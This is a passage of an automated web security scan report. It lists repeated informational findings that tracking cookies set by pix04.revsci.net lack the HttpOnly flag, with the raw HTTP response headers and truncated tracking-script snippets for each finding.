Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:19 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.364. http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/213412415.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk/dmP4TX+ser9duzVms895ML; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:38 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e647e&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:38 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk/dmP4TX+ser9duzVms895ML; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:38 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e647e&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:38 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:37 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.365. http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/213412415.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt34zskdUB6wb/neBD5w==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/
NETID01=TUl0eAsBEwoAAAi6CCwAAABj; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:12:56 GMT; Path=/
udm_0=MLvv7iEOIS5n5S4sf9LIKtCBJlhlZ4wlO6B9VyvkGoyzMH7D2WQp3ftWI0PMoz9Hh9fKDp1/mUeaTVZAD2sUmSEumxTZ7qTHeaTajtWig78dOo0vtnm9lh8+PcN1S2PGKsPZZhZd3IPo8wA3CBgyCxs8roLRagKRmKL+IMR2fkwptAZa7ZnjONj5PBl6mDenKzm6tvDzGiI2xJiEk+JZoEy3cJ7GsQ44kugPJQK2nLpvRboqevnJkiBn6cJUdF9g9l3Et37CRe44hpuXi4fQkPD6PSZagwqV8pwbYPDiSFUj/WYyu4jDKt6kZPsKfD8M97H9xnvsE8qaHADuNwoV3tqyK7nasBcM7aGO5JMRBtADmLpzlYS49Sgt+u92fAIOU8AWl4KqYMZQI63CJllHgWon/3yB0KkEhW5Ny6TGpSnYrUPRdHHIuyXVTbI2gihM4dqmj4m4wN4Z7tLwGL08cATb+7MzVV0mVwn4K9KsfwH9fFRLpJ+FUxk4edQ0kYnub2d/j8VnHB5QhQQgzJCswhu/UdS2f1SiTrmriDroOArOp6Z03WAlBLU6; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.366. http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/268190583.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LC1yGSiOI1VkRpa9w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:34 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e647a&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LC1yGSiOI1VkRpa9w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:34 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e647a&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:34 GMT; Path=/
X-Proc-ms: 9
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:33 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.367. http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/268190583.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFeU+FbxIQ1kNYvHseIeEiFPLY3sGlBwefeQGolpUspQOMVXTsemteSudqC0pSV1UN7CZ9KyQiVwn/zK5v5+ZZn71cfM4GDM50Q9Bw8GkAZ6L34ZmFnGKHV8+IM1GCBrxtqctOdKW322q4O2xI0xQVbFabIj862tETQanfX0EDjeVZi1FPBzZhlrQGJeM0b1IOojZ1EOdiRWtl2ZtO0tV+rCjUnwLONrvANz8CskgoTzHdE5YQzFjxb1WMuZoF3a1UNiIklxHRD9X1m5TDxPwAUF/RZOkC8aI=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/
NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d6e5e16&0&&4d4637e7&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:11:18 GMT; Path=/
rtc_0=MLsvsNUvMS5jJgE8Afe6cA8GOkRpRUJqdhGXytGsaksERlXaQKx/4QWi7SgDZPpq3+/yS+PtxMQT7DslgE+EiBMcoaILk+Ef3L6S+X2ToNJcKBHEUablLssaqzXvV0sN4iDF0eGzgINZcw0zPNEtmOEE06Lc75H0M56FBbh7W8JtRCa2OY8hXfnQ78Ntfwd8Pi/uyyCsCDe/7oef4Q68KNQWoA0k6/Ey/XPEcRFH6e+vUJvXkn234H1VDFNHBrAHQpXd6yTuomwDMbZxJsmZZvYCyYw7/cukzr9wj4x+P80HSx7GlXYrxd2NakbjRStgM+cuf+Zkw+bydKqoYwLxNe7ilVeQkPgJird4IqH9PvP6Fn0NuvtiIdlSlMv2k3YFE3VJySPI6vaNXu6zlawyJfcFjM7qAPDKrPYCruxbpRp6mdbcs11vMXenHTWL+6zILeuekHavtPJQ; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.368. http://pix04.revsci.net/F08747/b3/0/3/1003161/310338891.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/310338891.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9mCyCCM1VkT2a+s=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:20 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b0&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9mCyCCM1VkT2a+s=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:20 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b0&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:20 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:20 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.369. http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/364341298.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk/elPMXV+ser9duzVms/PpMe; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:47 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6487&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:47 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk/elPMXV+ser9duzVms/PpMe; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:47 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6487&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:47 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:46 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.370. http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/364341298.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7OC9yCTiWM1VkTma+k=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:05 GMT; Path=/
NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:05 GMT; Path=/
rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:05 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7OC9yCTiWM1VkTma+k=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:05 GMT; Path=/
Set-Cookie: NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:05 GMT; Path=/
Set-Cookie: rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:05 GMT; Path=/
X-Proc-ms: 14
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:13:04 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.371. http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/36740428.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFeU+FbwIUlVNWya6JSAvpln80ND94f6Pt9eNpD4dA52+8kOrNmqGxKr7OS2Tzwu4/IuK1NwSGYeUxtxQyhM3Z+6HbwyC2IteSIFUhs8vKdnBnw8DsPq4kmcuEJoI8J3nJDWXV7KJWyWaf+7RPcRWJQ0Wmgg7PETGvftUES/7vMlz2u9LmgGR/w99NoSaC1d7HM7rzg5lc7C3lUrHL9ZgVW0HBZ1XR/hPLadpbT3wbArYdm2Oqr25nMZce64VwXuH7zbD9+7pTkBUJwduZvS7Saia4nKA0; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:14:15 GMT; Path=/
NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:14:15 GMT; Path=/
rtc_0=MLsvsNUvMS5jJgG89H1UEJzjU+BBsKjEeIf8lOISRcnGovHI6UEjSecnRgLBNT8Lkm0Z6UFH5o7vRFRY8MuMgvGoVqILk+Ef3L6S+U2ToCodNBHEWablLktaqzXvV0/t4mDFE8G7gINZcw0zP9EsmOEEU6Pc75F0M551Bjh6mxtHMOMMxV/2E1w7zZJqYkmO11g8u4n8cdXr5Yef4Q48aNQWoA0k7fEy3bsDcBFH6e+vSJvXkn234H1VDVNDxrAHQmmi+yTuomwDMTdOoyoUQ1MxX3YwfrkMvonvDPbi6tbN+V5N+mbOqiXyakbjBTfgE/guB+ZkwybydKqpQwLhMs7qkXeQkPg1hrdYIqb9PhP1knwNupxp4cYRo/fEk3YFE3VJySPI4vKNXu6zlRzfeEaro4e0qoAh4nGZKHbX4JYfmdbcM11vMwenHTV1G6PILeuesJdg5/blQg==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:14:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.372. http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/36740428.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk3ekPYaX+Mer9duzVms/fpMT; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:05 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6499&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:05 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk3ekPYaX+Mer9duzVms/fpMT; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:05 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6499&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:05 GMT; Path=/
X-Proc-ms: 122
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:04 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.373. http://pix04.revsci.net/F08747/b3/0/3/1003161/374759838.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/374759838.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69ODFkETCCM1VkTna+U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:19 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98af&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:19 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69ODFkETCCM1VkTna+U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:19 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98af&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:19 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:19 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.374. http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/410748832.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtlR8qmZ5EYm2QQMyGpObby+s31dLuX4xv05SCKjYPZg8DcFAyTvYmP4RX+R+TaaI1VgVUa9Q=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:03 GMT; Path=/
rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:03 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtlR8qmZ5EYm2QQMyGpObby+s31dLuX4xv05SCKjYPZg8DcFAyTvYmP4RX+R+TaaI1VgVUa9Q=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:03 GMT; Path=/
Set-Cookie: rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:03 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:02 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.375. http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/410748832.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk3ckvYdU+ser9duzVms/e5MT; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:01 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6495&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:01 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk3ckvYdU+ser9duzVms/e5MT; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:01 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6495&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:01 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
